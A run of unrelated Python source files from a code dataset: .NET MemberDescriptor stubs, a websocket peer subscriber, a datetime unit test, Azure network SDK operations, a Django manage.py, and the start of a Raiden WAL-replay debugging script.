Returns: An instance of the component to invoke. This method returns a visual designer when the property
is attached to a visual designer.
"""
pass
def GetSite(self,*args):
"""
GetSite(component: object) -> ISite
Gets a component site for the given component.
component: The component for which you want to find a site.
Returns: The site of the component,or null if a site does not exist.
"""
pass
def __eq__(self,*args):
""" x.__eq__(y) <==> x==y """
pass
@staticmethod
def __new__(self,*args): #cannot find CLR constructor
"""
__new__(cls: type,name: str)
__new__(cls: type,name: str,attributes: Array[Attribute])
__new__(cls: type,descr: MemberDescriptor)
__new__(cls: type,oldMemberDescriptor: MemberDescriptor,newAttributes: Array[Attribute])
"""
pass
def __ne__(self,*args):
pass
AttributeArray=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets an array of attributes.
"""
Attributes=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the collection of attributes for this member.
Get: Attributes(self: MemberDescriptor) -> AttributeCollection
"""
Category=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the name of the category to which the member belongs,as specified in the System.ComponentModel.CategoryAttribute.
Get: Category(self: MemberDescriptor) -> str
"""
Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the description of the member,as specified in the System.ComponentModel.DescriptionAttribute.
Get: Description(self: MemberDescriptor) -> str
"""
DesignTimeOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets whether this member should be set only at design time,as specified in the System.ComponentModel.DesignOnlyAttribute.
Get: DesignTimeOnly(self: MemberDescriptor) -> bool
"""
DisplayName=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the name that can be displayed in a window,such as a Properties window.
Get: DisplayName(self: MemberDescriptor) -> str
"""
IsBrowsable=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value indicating whether the member is browsable,as specified in the System.ComponentModel.BrowsableAttribute.
Get: IsBrowsable(self: MemberDescriptor) -> bool
"""
Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the name of the member.
Get: Name(self: MemberDescriptor) -> str
"""
NameHashCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the hash code for the name of the member,as specified in System.String.GetHashCode.
"""
| 24.763158 | 126 | 0.705329 | class MemberDescriptor(object):
def CreateAttributeCollection(self,*args):
pass
def Equals(self,obj):
pass
def FillAttributes(self,*args):
pass
def FindMethod(self,*args):
pass
def GetHashCode(self):
pass
def GetInvocationTarget(self,*args):
pass
def GetInvokee(self,*args):
pass
def GetSite(self,*args):
pass
def __eq__(self,*args):
pass
@staticmethod
def __new__(self,*args):
pass
def __ne__(self,*args):
pass
AttributeArray=property(lambda self: object(),lambda self,v: None,lambda self: None)
Attributes=property(lambda self: object(),lambda self,v: None,lambda self: None)
Category=property(lambda self: object(),lambda self,v: None,lambda self: None)
Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
DesignTimeOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
DisplayName=property(lambda self: object(),lambda self,v: None,lambda self: None)
IsBrowsable=property(lambda self: object(),lambda self,v: None,lambda self: None)
Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
NameHashCode=property(lambda self: object(),lambda self,v: None,lambda self: None)
| true | true |
1c3c7dc962d6b6cba742e9ed1e8000ba84bde9d9 | 1,357 | py | Python | src/intergalactic/peer/subscriber.py | robmoorman/intergalactic | a4ac6a6def61139435d6694c363896efee9f117c | [
"Apache-2.0"
] | 1 | 2021-02-15T15:22:08.000Z | 2021-02-15T15:22:08.000Z | src/intergalactic/peer/subscriber.py | robmoorman/intergalactic | a4ac6a6def61139435d6694c363896efee9f117c | [
"Apache-2.0"
] | null | null | null | src/intergalactic/peer/subscriber.py | robmoorman/intergalactic | a4ac6a6def61139435d6694c363896efee9f117c | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Rob Moorman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import websockets
from intergalactic import settings
from intergalactic.peer.handlers import message_handler
from intergalactic.peer.manager import manager
from intergalactic.types import MessageType
from intergalactic.utils import logging
logger = logging.get_logger(__name__)
async def subscribe_to_peer(url):
ws = await websockets.connect(url)
await init_peer_connection(ws, url=url)
async def init_peer_connection(ws, url=None, trigger_initial_message=True):
if url is not None:
manager.add_peer(url)
manager.add_socket(ws)
if trigger_initial_message:
await ws.send(json.dumps({
"type": MessageType.PING.value
}))
while True:
msg = await ws.recv()
await message_handler(ws, msg)
| 28.87234 | 75 | 0.745763 |
import json
import websockets
from intergalactic import settings
from intergalactic.peer.handlers import message_handler
from intergalactic.peer.manager import manager
from intergalactic.types import MessageType
from intergalactic.utils import logging
logger = logging.get_logger(__name__)
async def subscribe_to_peer(url):
ws = await websockets.connect(url)
await init_peer_connection(ws, url=url)
async def init_peer_connection(ws, url=None, trigger_initial_message=True):
if url is not None:
manager.add_peer(url)
manager.add_socket(ws)
if trigger_initial_message:
await ws.send(json.dumps({
"type": MessageType.PING.value
}))
while True:
msg = await ws.recv()
await message_handler(ws, msg)
| true | true |
1c3c7dd4209dc5d0e2e30918d7471e401c1e4c48 | 1,005 | py | Python | components/iscesys/DateTimeUtil/test/test_datetimeutil.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 1,133 | 2022-01-07T21:24:57.000Z | 2022-01-07T21:33:08.000Z | components/iscesys/DateTimeUtil/test/test_datetimeutil.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 276 | 2019-02-10T07:18:28.000Z | 2022-03-31T21:45:55.000Z | components/iscesys/DateTimeUtil/test/test_datetimeutil.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 235 | 2019-02-10T05:00:53.000Z | 2022-03-18T07:37:24.000Z | import datetime
import unittest
from iscesys.DateTimeUtil.DateTimeUtil import DateTimeUtil
class DateTimeUtilTest(unittest.TestCase):
def setUp(self):
self.dt1 = datetime.datetime(year=2004,month=3,day=15,hour=12,minute=30,second=0)
self.dt2 = datetime.datetime(year=2004,month=3,day=15,hour=12,minute=59,second=15)
def tearDown(self):
pass
def testTimeDeltaToSeconds(self):
ans = 29*60.0+15
td = self.dt2-self.dt1
numSeconds = DateTimeUtil.timeDeltaToSeconds(td)
self.assertAlmostEquals(numSeconds,ans,5)
def testSecondsSinceMidnight(self):
ans = 86400.0/2 + 30.0*60
numSeconds = DateTimeUtil.secondsSinceMidnight(self.dt1)
self.assertAlmostEquals(numSeconds,ans,5)
def testDateTimeToDecimalYear(self):
ans = 2004.2053388
decimalYear = DateTimeUtil.dateTimeToDecimalYear(self.dt1)
self.assertAlmostEquals(decimalYear,ans,5)
if __name__ == "__main__":
unittest.main()
| 29.558824 | 90 | 0.700498 | import datetime
import unittest
from iscesys.DateTimeUtil.DateTimeUtil import DateTimeUtil
class DateTimeUtilTest(unittest.TestCase):
def setUp(self):
self.dt1 = datetime.datetime(year=2004,month=3,day=15,hour=12,minute=30,second=0)
self.dt2 = datetime.datetime(year=2004,month=3,day=15,hour=12,minute=59,second=15)
def tearDown(self):
pass
def testTimeDeltaToSeconds(self):
ans = 29*60.0+15
td = self.dt2-self.dt1
numSeconds = DateTimeUtil.timeDeltaToSeconds(td)
self.assertAlmostEquals(numSeconds,ans,5)
def testSecondsSinceMidnight(self):
ans = 86400.0/2 + 30.0*60
numSeconds = DateTimeUtil.secondsSinceMidnight(self.dt1)
self.assertAlmostEquals(numSeconds,ans,5)
def testDateTimeToDecimalYear(self):
ans = 2004.2053388
decimalYear = DateTimeUtil.dateTimeToDecimalYear(self.dt1)
self.assertAlmostEquals(decimalYear,ans,5)
if __name__ == "__main__":
unittest.main()
| true | true |
1c3c7e621677eba074969705f82fa8e2ede0d5b9 | 8,757 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2017_09_01/operations/_load_balancer_frontend_ip_configurations_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 2 | 2019-05-17T21:24:53.000Z | 2020-02-12T11:13:42.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2017_09_01/operations/_load_balancer_frontend_ip_configurations_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 15 | 2019-07-12T18:18:04.000Z | 2019-07-25T20:55:51.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2017_09_01/operations/_load_balancer_frontend_ip_configurations_operations.py | LianwMS/azure-sdk-for-python | 612d7bca9de86ee1bd1fa59291d7bf897ba9213f | [
"MIT"
] | 2 | 2020-05-21T22:51:22.000Z | 2020-05-26T20:53:01.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerFrontendIPConfigurationsOperations(object):
"""LoadBalancerFrontendIPConfigurationsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2017_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
load_balancer_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.LoadBalancerFrontendIPConfigurationListResult"]
"""Gets all the load balancer frontend IP configurations.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either LoadBalancerFrontendIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2017_09_01.models.LoadBalancerFrontendIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.LoadBalancerFrontendIPConfigurationListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-09-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('LoadBalancerFrontendIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations'} # type: ignore
def get(
self,
resource_group_name, # type: str
load_balancer_name, # type: str
frontend_ip_configuration_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.FrontendIPConfiguration"
"""Gets load balancer frontend IP configuration.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:param frontend_ip_configuration_name: The name of the frontend IP configuration.
:type frontend_ip_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FrontendIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2017_09_01.models.FrontendIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.FrontendIPConfiguration"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-09-01"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'frontendIPConfigurationName': self._serialize.url("frontend_ip_configuration_name", frontend_ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('FrontendIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations/{frontendIPConfigurationName}'} # type: ignore
| 48.65 | 228 | 0.676716 |
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerFrontendIPConfigurationsOperations(object):
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name,
load_balancer_name,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-09-01"
def prepare_request(next_link=None):
if not next_link:
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {}
header_parameters = {}
header_parameters['Accept'] = 'application/json'
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('LoadBalancerFrontendIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations'}
def get(
self,
resource_group_name,
load_balancer_name,
frontend_ip_configuration_name,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-09-01"
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'frontendIPConfigurationName': self._serialize.url("frontend_ip_configuration_name", frontend_ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
header_parameters = {}
header_parameters['Accept'] = 'application/json'
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('FrontendIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations/{frontendIPConfigurationName}'}
| true | true |
1c3c7ec61534821e17a751ca0f96fbb881982387 | 631 | py | Python | backend/manage.py | crowdbotics-apps/dookh-28435 | 61989e90fda5d3b05e98748f15d42e7c852d07ba | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/manage.py | crowdbotics-apps/dookh-28435 | 61989e90fda5d3b05e98748f15d42e7c852d07ba | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/manage.py | crowdbotics-apps/dookh-28435 | 61989e90fda5d3b05e98748f15d42e7c852d07ba | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'dookh_28435.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 28.681818 | 75 | 0.684628 |
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'dookh_28435.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| true | true |
1c3c7f0543309cbb6edf91512c6c20ad1c6ee911 | 11,079 | py | Python | tools/debugging/replay_wal.py | JamieSlome/raiden | ccd11e59c1259fdd661b31df706e511dd6e6bc9f | [
"MIT"
] | null | null | null | tools/debugging/replay_wal.py | JamieSlome/raiden | ccd11e59c1259fdd661b31df706e511dd6e6bc9f | [
"MIT"
] | null | null | null | tools/debugging/replay_wal.py | JamieSlome/raiden | ccd11e59c1259fdd661b31df706e511dd6e6bc9f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
This script is meant to be used as a template to step through a provided DB file
for debugging a specific issue.
It constructs the chain_state through the _state_manager and uses the WAL
to replay all state changes through the state machines until all state changes are consumed.
The parameters (token_network_address and partner_address) will help filter out all
state changes until a channel is found with the provided token network address and partner.
The ignored state changes will still be applied, but they will just not be printed out.
"""
import json
import re
from contextlib import closing
from pathlib import Path
from typing import NoReturn, TextIO
import click
from eth_utils import encode_hex, is_address, to_canonical_address, to_checksum_address
from raiden.storage.serialization import JSONSerializer
from raiden.storage.sqlite import (
LOW_STATECHANGE_ULID,
RANGE_ALL_STATE_CHANGES,
SerializedSQLiteStorage,
)
from raiden.storage.wal import WriteAheadLog, dispatch
from raiden.transfer import channel, node, views
from raiden.transfer.architecture import Event, StateChange
from raiden.transfer.state import NetworkState
from raiden.utils.formatting import pex
from raiden.utils.typing import (
Address,
Any,
Balance,
ChannelID,
Dict,
Iterable,
List,
Nonce,
Optional,
SecretHash,
TokenNetworkAddress,
Tuple,
)
class Translator(dict):
"""Dictionary class with re substitution capabilities."""
def __init__(self, *args: Any, **kwargs: Any) -> None:
kwargs = {k.lower(): v for k, v in args[0].items()}
super().__init__(kwargs)
self._extra_keys: Dict[str, str] = dict()
self._regex: Optional[re.Pattern[str]] = None
self._make_regex()
def _address_rxp(self, addr: str) -> str:
"""Create a regex string for addresses, that matches several representations:
- with(out) '0x' prefix
- `pex` version
This function takes care of maintaining additional lookup keys for substring matches.
In case the given string is no address, it returns the original string.
"""
try:
addr = str(to_checksum_address(addr))
rxp = "(?:0x)?" + pex(to_canonical_address(addr)) + f"(?:{addr.lower()[10:]})?"
self._extra_keys[pex(to_canonical_address(addr))] = addr.lower()
self._extra_keys[addr[2:].lower()] = addr.lower()
except ValueError:
rxp = addr
return rxp
def _make_regex(self) -> None:
"""Compile rxp with all keys concatenated."""
rxp = "|".join(map(self._address_rxp, self.keys()))
self._regex = re.compile(rxp, re.IGNORECASE)
def __setitem__(self, key: str, value: Any) -> NoReturn:
raise NotImplementedError(f"{self.__class__} must not dynamically modified")
def __pop__(self, key: str) -> NoReturn:
raise NotImplementedError(f"{self.__class__} must not dynamically modified")
def __getitem__(self, key: str) -> Any:
try:
return dict.__getitem__(self, key)
except KeyError as e:
alt = self._extra_keys.get(key)
try:
return dict.__getitem__(self, alt)
except KeyError:
raise e
def __call__(self, match: re.Match) -> str:
"""Lookup for each rxp match."""
return "[{}]".format(self[match.group(0).lower()])
def translate(self, text: str) -> str:
"""Translate text."""
assert self._regex is not None, "regex not set"
return self._regex.sub(self, text)
def state_change_contains_secrethash(obj: Any, secrethash: SecretHash) -> bool:
return (hasattr(obj, "secrethash") and obj.secrethash == secrethash) or (
hasattr(obj, "transfer")
and (
(hasattr(obj.transfer, "secrethash") and obj.transfer.secrethash == secrethash)
or (hasattr(obj.transfer, "lock") and obj.transfer.lock.secrethash == secrethash)
)
)
def state_change_with_nonce(
obj: Any, nonce: Nonce, channel_identifier: ChannelID, sender: Address
) -> bool:
return (
hasattr(obj, "balance_proof")
and obj.balance_proof.nonce == nonce
and obj.balance_proof.channel_identifier == channel_identifier
and obj.balance_proof.sender == to_canonical_address(sender)
)
def print_attributes(data: Dict, translator: Optional[Translator] = None) -> None:
if translator is None:
trans = lambda s: s
else:
trans = translator.translate
for key, value in data.items():
if isinstance(value, bytes):
value = encode_hex(value)
click.echo("\t", nl=False)
click.echo(click.style(key, fg="blue"), nl=False)
click.echo(click.style("="), nl=False)
click.echo(click.style(trans(repr(value)), fg="yellow"))
def print_state_change(state_change: StateChange, translator: Optional[Translator] = None) -> None:
click.echo(click.style(f"> {state_change.__class__.__name__}", fg="red", bold=True))
print_attributes(state_change.__dict__, translator=translator)
def print_events(events: Iterable[Event], translator: Optional[Translator] = None) -> None:
for event in events:
click.echo(click.style(f"< {event.__class__.__name__}", fg="green", bold=True))
print_attributes(event.__dict__, translator=translator)
def print_presence_view(chain_state: Any, translator: Optional[Translator] = None) -> None:
if translator is None:
trans = lambda s: s
else:
trans = translator.translate
def network_state_to_color(network_state: NetworkState) -> Optional[str]:
if network_state == NetworkState.REACHABLE:
return "green"
if network_state == NetworkState.UNREACHABLE:
return "red"
if network_state == NetworkState.UNKNOWN:
return "white"
return None
click.secho("Presence:", nl=False, fg="white")
for k, v in chain_state.nodeaddresses_to_networkstates.items():
click.secho(f" {trans(pex(k))}", fg=network_state_to_color(v), nl=False)
click.echo("", nl=True)
def get_node_balances(
chain_state: Any, token_network_address: TokenNetworkAddress
) -> List[Tuple[Address, Balance, Balance]]:
channels = views.list_all_channelstate(chain_state)
channels = [
raiden_channel
for raiden_channel in channels
if raiden_channel.canonical_identifier.token_network_address # type: ignore
== to_canonical_address(token_network_address)
]
balances = [
(
channel_state.partner_state.address,
channel.get_balance(channel_state.our_state, channel_state.partner_state),
channel.get_balance(channel_state.partner_state, channel_state.our_state),
)
for channel_state in channels
]
return balances
def print_node_balances(
chain_state: Any,
token_network_address: TokenNetworkAddress,
translator: Optional[Translator] = None,
) -> None:
if translator is None:
trans = lambda s: s
else:
trans = translator.translate
balances = get_node_balances(chain_state, token_network_address)
for balance in balances:
click.secho(f"{trans(pex(balance[0]))} ->{balance[1]} <-{balance[2]}", fg="blue")
click.secho(f"Sum {trans(pex(chain_state.our_address))}: {sum(b[1] for b in balances)}")
def print_nl() -> None:
click.echo("-" * click.get_terminal_size()[0], nl=True)
def replay_wal(
storage: SerializedSQLiteStorage,
token_network_address: TokenNetworkAddress,
partner_address: Address,
translator: Optional[Translator] = None,
) -> None:
snapshot = storage.get_snapshot_before_state_change(
state_change_identifier=LOW_STATECHANGE_ULID
)
assert snapshot is not None, "No snapshot found"
wal = WriteAheadLog(snapshot.data, storage, node.state_transition) # type: ignore
state = wal.get_current_state()
all_state_changes = storage.get_statechanges_by_range(RANGE_ALL_STATE_CHANGES)
for state_change in all_state_changes:
# Dispatching the state changes one-by-one to easy debugging
state, events = dispatch(
state=state,
state_change=state_change,
state_transition=wal.state_transition,
)
msg = "Chain state must never be cleared up."
assert state, msg
channel_state = views.get_channelstate_by_token_network_and_partner(
state, # type: ignore
to_canonical_address(token_network_address), # type: ignore
to_canonical_address(partner_address),
)
if channel_state is None:
continue
###
# Customize this to filter things further somewhere around here.
# An example would be to add `breakpoint()`
# and inspect the state.
###
print_state_change(state_change, translator=translator)
print_events(events, translator=translator)
# Enable to print color coded presence state of channel partners
# print_presence_view(chain_state, translator)
# Enable to print balances & balance sum with all channel partners
# print_node_balances(chain_state, token_network_address, translator)
print_nl()
@click.command(help=__doc__)
@click.argument("db-file", type=click.Path(exists=True))
@click.argument("token-network-address")
@click.argument("partner-address")
@click.option(
"-x",
"--names-translator",
type=click.File(),
help="A JSON file with replacement rules, e.g.: "
'\'{ "0xb4f44cd22a84DE0774B802e422D4c26A73Dd68d7": "Bob", '
'"identifier": "XXX" }\' would replace all instances of the address (pex\'ed, lowercase, '
'checksummed) with "[Bob]" and all mentions of "identifier" with "[XXX]. '
'It also allows you to use "Bob" as parameter value for "-n" and "-p" switches.',
)
def main(
db_file: str, token_network_address: str, partner_address: str, names_translator: TextIO
) -> None:
translator: Optional[Translator]
if names_translator:
translator = Translator(json.load(names_translator))
lookup = {v: k for k, v in translator.items()}
token_network_address = lookup.get(token_network_address, token_network_address)
partner_address = lookup.get(partner_address, partner_address)
else:
translator = None
assert is_address(token_network_address), "token_network_address must be provided"
assert is_address(partner_address), "partner_address must be provided"
with closing(SerializedSQLiteStorage(Path(db_file), JSONSerializer())) as storage:
replay_wal(
storage=storage,
token_network_address=TokenNetworkAddress(to_canonical_address(token_network_address)),
partner_address=to_canonical_address(partner_address),
translator=translator,
)
if __name__ == "__main__":
main() # pylint: disable=no-value-for-parameter
| 36.205882 | 99 | 0.678401 |
import json
import re
from contextlib import closing
from pathlib import Path
from typing import NoReturn, TextIO
import click
from eth_utils import encode_hex, is_address, to_canonical_address, to_checksum_address
from raiden.storage.serialization import JSONSerializer
from raiden.storage.sqlite import (
LOW_STATECHANGE_ULID,
RANGE_ALL_STATE_CHANGES,
SerializedSQLiteStorage,
)
from raiden.storage.wal import WriteAheadLog, dispatch
from raiden.transfer import channel, node, views
from raiden.transfer.architecture import Event, StateChange
from raiden.transfer.state import NetworkState
from raiden.utils.formatting import pex
from raiden.utils.typing import (
Address,
Any,
Balance,
ChannelID,
Dict,
Iterable,
List,
Nonce,
Optional,
SecretHash,
TokenNetworkAddress,
Tuple,
)
class Translator(dict):
def __init__(self, *args: Any, **kwargs: Any) -> None:
kwargs = {k.lower(): v for k, v in args[0].items()}
super().__init__(kwargs)
self._extra_keys: Dict[str, str] = dict()
self._regex: Optional[re.Pattern[str]] = None
self._make_regex()
def _address_rxp(self, addr: str) -> str:
try:
addr = str(to_checksum_address(addr))
rxp = "(?:0x)?" + pex(to_canonical_address(addr)) + f"(?:{addr.lower()[10:]})?"
self._extra_keys[pex(to_canonical_address(addr))] = addr.lower()
self._extra_keys[addr[2:].lower()] = addr.lower()
except ValueError:
rxp = addr
return rxp
